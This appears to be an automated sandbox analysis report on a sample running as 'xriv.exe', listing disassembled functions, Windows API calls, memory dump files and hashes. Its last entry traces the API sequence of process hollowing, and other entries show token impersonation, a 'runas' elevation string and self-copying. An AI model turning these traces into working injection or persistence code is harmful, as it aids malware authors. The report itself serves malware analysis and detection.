Function 00007FF9A5D41760 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FF9A5D417F5

Memory Dump Source

Source File: 00000004.00000002.363203487.00007FF9A5D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a5d40000_nika.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 6dcb633cef9eff45c6c767a65258031399b012e8a3e62cff6c440592520fc1b9
Instruction ID: 691ee98038857addc4ed02e5933b7afd6690282ac247e7551b0dc4b3e63f4a2d
Opcode Fuzzy Hash: 6dcb633cef9eff45c6c767a65258031399b012e8a3e62cff6c440592520fc1b9
Instruction Fuzzy Hash: EB31E530908A4D9FDB58DFA8C805BF9BBF0EB56321F00422ED04DC3191CB74A856CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: xriv.exePID: 3096, Parent PID: 4604COMMON

Executed Functions

Function 008DA9A1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(008DE000,?,008DA9A0,008DAF26,?,008DE000,008DAF26,008DE000), ref: 008DA9C3
TerminateProcess.KERNEL32(00000000,?,008DA9A0,008DAF26,?,008DE000,008DAF26,008DE000), ref: 008DA9CA
ExitProcess.KERNEL32 ref: 008DA9DC

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: df3920643c07ac201388ff709ddb9e35c8b4467df514e55255b756570e91b258
Instruction ID: 87e5ac227636541df8c79f6e761db1fbbf5bb382b31964e3f5f9e25202de1a54
Opcode Fuzzy Hash: df3920643c07ac201388ff709ddb9e35c8b4467df514e55255b756570e91b258
Instruction Fuzzy Hash: 14E0B631000148BBCF166B58DC59A593F69FB41342F254516F815CA632CB79EDD1DB92

Uniqueness

Uniqueness Score: -1.00%

Function 008D7A74 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,008D7776), ref: 008D7A79

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c85106e302d70212342e09fb3483d7c59d2b433afff85555d2f50309f22e9b6a
Instruction ID: 1facbd436d604bccf30e2fbbb5a306b1b18e1aab3572470f12a1a784ac437708
Opcode Fuzzy Hash: c85106e302d70212342e09fb3483d7c59d2b433afff85555d2f50309f22e9b6a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 008D704A Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(008F9708,00000FA0,?,?,008D7028), ref: 008D7056
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,008D7028), ref: 008D7061
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,008D7028), ref: 008D7072
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008D7084
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008D7092
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,008D7028), ref: 008D70B5
___scrt_fastfail.LIBCMT ref: 008D70C6
DeleteCriticalSection.KERNEL32(008F9708,00000007,?,?,008D7028), ref: 008D70D1
CloseHandle.KERNEL32(00000000,?,?,008D7028), ref: 008D70E1

Strings

kernel32.dll, xrefs: 008D706D
SleepConditionVariableCS, xrefs: 008D707E
WakeAllConditionVariable, xrefs: 008D708A
api-ms-win-core-synch-l1-2-0.dll, xrefs: 008D705C

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: fc65c61791d344492db9c33da6648320df1f939ca5a4f61081c39c79b04827a1
Instruction ID: 44718660aa0f76c0bdbfc56336931b2427256c884c8e0225ac463d19821d4026
Opcode Fuzzy Hash: fc65c61791d344492db9c33da6648320df1f939ca5a4f61081c39c79b04827a1
Instruction Fuzzy Hash: 9301D471665B506BDB202F76AC09F6A3B98FB85B41F000156FA40D63E0FBB4CC00CA61

Uniqueness

Uniqueness Score: -1.00%

Function 008E26AF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E2368: CreateFileW.KERNELBASE(00000000,00000000,?,008E2758,?,?,00000000,?,008E2758,00000000,0000000C), ref: 008E2385

GetLastError.KERNEL32 ref: 008E27C3
__dosmaperr.LIBCMT ref: 008E27CA
GetFileType.KERNELBASE(00000000), ref: 008E27D6
GetLastError.KERNEL32 ref: 008E27E0
__dosmaperr.LIBCMT ref: 008E27E9
CloseHandle.KERNEL32(00000000), ref: 008E2809
CloseHandle.KERNEL32(008DD4F0), ref: 008E2956
GetLastError.KERNEL32 ref: 008E2988
__dosmaperr.LIBCMT ref: 008E298F

Strings

H, xrefs: 008E2914

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4051bf42bd9a8d42fc5aaff2c382d9f3781ac842d674217bf859691f61aa65e9
Instruction ID: 44ad941081cb30c572ff6c0f9697bd7a4c4ea3ca030bd945bf8494b22f155573
Opcode Fuzzy Hash: 4051bf42bd9a8d42fc5aaff2c382d9f3781ac842d674217bf859691f61aa65e9
Instruction Fuzzy Hash: 12A1D4329041989FCF19EF6CDC91BAD3BA5FB4B324F140259E811EB392CB749916CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008C9C30 Relevance: 7.7, APIs: 5, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 008C9C90

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 4a81c8be3620db738637c2bfdf671804b5002d83665aa935448ebdbf5b2b89d9
Instruction ID: f6dce4933412f9b9f3d395612538572560f7b455b83b52ddd6cf53a941f01856
Opcode Fuzzy Hash: 4a81c8be3620db738637c2bfdf671804b5002d83665aa935448ebdbf5b2b89d9
Instruction Fuzzy Hash: 99A15CB090026C8BDB24DB28CC44BDDB7B9FB45314F5045D9D609A7282DB759BC8CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 008C3FF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 470
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 008C42B9
SetCurrentDirectoryA.KERNEL32(00000000,16D98AA8), ref: 008C4364

Strings

runas, xrefs: 008C3B63

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: CurrentDirectorySleep
String ID: runas
API String ID: 16921501-4000483414
Opcode ID: 3eaecdbc6e821982d9acae520a5aafeba10840a28ac71949c63fed0198b74431
Instruction ID: a8b3587909f274d41e2bdfc01340fe541002f10124f20deecb574c332ca0209a
Opcode Fuzzy Hash: 3eaecdbc6e821982d9acae520a5aafeba10840a28ac71949c63fed0198b74431
Instruction Fuzzy Hash: DAE10471A10148ABDB08EB7CCD56BADBB72FB45314F50825DF411EB3C6EB358A848792

Uniqueness

Uniqueness Score: -1.00%

Function 008CA032 Relevance: 4.6, APIs: 3, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 008CA04D
GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 008CA068
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008CA1A5

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: File$AttributesCopyCreateDirectory
String ID:
API String ID: 210682061-0
Opcode ID: ecfa6a14deeb92d0dd225263298c72dd657ac63f32f6632d1cac7b0996195569
Instruction ID: d1bcd118f4ff101339f629fb449828ac50eccdd21141423bd395c6fc4558efc1
Opcode Fuzzy Hash: ecfa6a14deeb92d0dd225263298c72dd657ac63f32f6632d1cac7b0996195569
Instruction Fuzzy Hash: C941C4B1A0051C8BDB18DB28CC85B9CB774FF44314F9402DDE609E7282DB35AAC48B6B

Uniqueness

Uniqueness Score: -1.00%

Function 008C9D04 Relevance: 3.3, APIs: 2, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008C9EB5
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008CA1A5

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: File$CopyModuleName
String ID:
API String ID: 4108865673-0
Opcode ID: e4034e8d30e2d261c3fa68cc905d2d45ad407240ba291f8e2fe7040c798ede55
Instruction ID: 1dae45ff084919f334bb6e830cb0510cf29d5875a8eda56ed09bb62b58b6fd28
Opcode Fuzzy Hash: e4034e8d30e2d261c3fa68cc905d2d45ad407240ba291f8e2fe7040c798ede55
Instruction Fuzzy Hash: 33C1F4B1A001188BDB28DB28CC49B9DB735FB41314F5442DDE549E7282DB31DEC58B6A

Uniqueness

Uniqueness Score: -1.00%

Function 008DC25D Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 008DC2A5

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f874ecf7ae008d78967b9f137096533db1f662eccfc645f361e7fc3a5a9da60a
Instruction ID: ae528027a96e5a993f88ef98161832baf782c46121361c0fa806bad6a67f8009
Opcode Fuzzy Hash: f874ecf7ae008d78967b9f137096533db1f662eccfc645f361e7fc3a5a9da60a
Instruction Fuzzy Hash: 9CE0E52250161245D21266BE7C017691781FFA1735F114727F468C63D0DF708841C8A6

Uniqueness

Uniqueness Score: -1.00%

Function 008D5E20 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 008D5F53

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
Instruction ID: f70573d0f2f7f97cab6241fafea60840c0f06bb9aead869a98e67aa18514f0ee
Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
Instruction Fuzzy Hash: 1631F4716046049BD728AF7CD88196EB7A9FB44320B24477FF965CB381EA709E448792

Uniqueness

Uniqueness Score: -1.00%

Function 008D7403 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 008C218E

Part of subcall function 008D8483: RaiseException.KERNEL32(E06D7363,00000001,00000003,008C216C,?,?,?,008C216C,?,008F6D1C), ref: 008D84E3

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID:
API String ID: 3109751735-0
Opcode ID: 9deb7f53ee7b000f408ae0d249e4dfd9d46f27f8a76e0eb7ea346cc35a289e84
Instruction ID: 08ba3e05c08dcb8885f97608dc0f2d5d6db946ec03ec0ac78495e1212d4539f1
Opcode Fuzzy Hash: 9deb7f53ee7b000f408ae0d249e4dfd9d46f27f8a76e0eb7ea346cc35a289e84
Instruction Fuzzy Hash: 5E01C47580020DA7CB14BAEDD802999B7ADFE01324F108737BA24D6781FB70E95486D6

Uniqueness

Uniqueness Score: -1.00%

Function 008DD4B1 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 008DD4EB

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b286d143201d2a3952abeb77d421313b766353190bcb4e92a564619ca96af88e
Instruction ID: 40f428686a59a1c1f753a654b525060082e3cbf8ea3096a9773c90e9992831af
Opcode Fuzzy Hash: b286d143201d2a3952abeb77d421313b766353190bcb4e92a564619ca96af88e
Instruction Fuzzy Hash: 03111872A0420AAFCB05DF58E941A9F7BF4FF48304F054199F805EB351E670EA11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008DED56 Relevance: 1.6, APIs: 1, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008DF925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008DE0E6,00000001,00000364,00000006,000000FF,?,?,008D8272,?), ref: 008DF966

_free.LIBCMT ref: 008DEDC5

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
Instruction ID: bf317db0872310916fad97ad49ce3f98b8eb1027feeff977241e38c91b08751a
Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
Instruction Fuzzy Hash: FD012672604316ABC321AF9DD88599AFB98FB053B0F11072BE559EB7C0E7706C00C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 008E2621 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 008E2684

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
Instruction ID: 3e687a397174c977043821a8dca4299746f5746d1af13ab0549d8763814dda9a
Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
Instruction Fuzzy Hash: CB014472C00159AFCF01AFA99C019DE7FB9FF18310F144666FD15E2161E6318A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 008DF925 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008DE0E6,00000001,00000364,00000006,000000FF,?,?,008D8272,?), ref: 008DF966

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 050ea9b356740fc61ecfaa72aad4e629605a3b1455e08366ce08401da5ecc06b
Instruction ID: c017b965179662059cc0e6a38ffc33fc169e758cc2a61c382a0e61065c079724
Opcode Fuzzy Hash: 050ea9b356740fc61ecfaa72aad4e629605a3b1455e08366ce08401da5ecc06b
Instruction Fuzzy Hash: B5F0B431A15269B79B215A368C21B5B3F49FF41774B158333EE16DA382CB20DC01A6E1

Uniqueness

Uniqueness Score: -1.00%

Function 008DDB3C Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,008D8272,?,?,?,?,?,008C20C3,?,?), ref: 008DDB6E

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aa334fa4840cd98355941e0aa3c81b0694fd85627eb899c02b24e9f1ffa539da
Instruction ID: 71373807149b39c761272fad9e0b55b2547a109224ad7ca4da7d9289df8f8835
Opcode Fuzzy Hash: aa334fa4840cd98355941e0aa3c81b0694fd85627eb899c02b24e9f1ffa539da
Instruction Fuzzy Hash: D5E06D31500365A7DA71267A9C01BAA3798FB413B9F170327EC1ADE390CB60CC0081E6

Uniqueness

Uniqueness Score: -1.00%

Function 008E2368 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,008E2758,?,?,00000000,?,008E2758,00000000,0000000C), ref: 008E2385

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8c0000_xriv.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 303d805c929ebd83c302c27349e85bd0c11326f8b856c5415d1c54f996212804
Instruction ID: 93a082ffcfa01e5603d635d8ba3e22e5fd5dcc7f0a74671d1144e3eeae794e15
Opcode Fuzzy Hash: 303d805c929ebd83c302c27349e85bd0c11326f8b856c5415d1c54f996212804
Instruction Fuzzy Hash: 3ED06C3200014DBBDF028F84DD46EDA3FAAFB48714F014000BA1856020C732E861AB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008C38C0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 163injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008C38E6
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 008C394B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 008C3964
GetThreadContext.KERNEL32(?,00000000), ref: 008C397F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 008C39A3
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 008C39BE
GetProcAddress.KERNEL32(00000000), ref: 008C39C5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 008C39ED
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 008C3A0E
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 008C3A5A
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 008C3A96
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 008C3AB2
ResumeThread.KERNEL32(?,?,?,00000000), ref: 008C3ABE
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 008C3ACC
VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C3AED

Strings

NtUnmapViewOfSection, xrefs: 008C39B4
, xrefs: 008C3998
ntdll.dll, xrefs: 008C39B9

Memory Dump Source

Source File: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000006.00000002.365322588.00000000008C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365382871.00000000008F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.365391713.00000000008FD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

